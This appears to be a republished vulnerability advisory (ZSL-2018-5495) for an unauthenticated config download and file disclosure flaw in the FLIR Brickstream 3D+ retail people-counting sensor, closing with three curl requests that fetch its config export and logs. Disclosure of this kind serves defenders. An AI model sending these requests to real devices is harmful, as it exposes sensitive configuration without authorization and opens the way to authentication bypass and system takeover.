The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config download and file disclosure vulnerability when calling the ExportConfig REST API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access.
28f859be185735a935a473e099613589b8afccb4843208fedf69d3181dd9add9
FLIR Systems FLIR Brickstream 3D+ Unauthenticated Config Download File Disclosure
Vendor: FLIR Systems, Inc.
Product web page: http://www.brickstream.com
Affected version: Firmware: 2.1.742.1842
Api: 1.0.0
Node: 0.10.33
Onvif: 0.1.1.47
Summary: The Brickstream line of sensors provides highly accurate, anonymous
information about how people move into, around, and out of physical places.
These smart devices are installed overhead inside retail stores, malls, banks,
stadiums, transportation terminals and other brick-and-mortar locations to
measure people's behaviors within the space.
Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
download and file disclosure vulnerability when calling the ExportConfig REST
API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
information and help her in authentication bypass, privilege escalation and/or
full system access.
Tested on: Titan
Api/1.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5495
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
26.07.2018
--
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed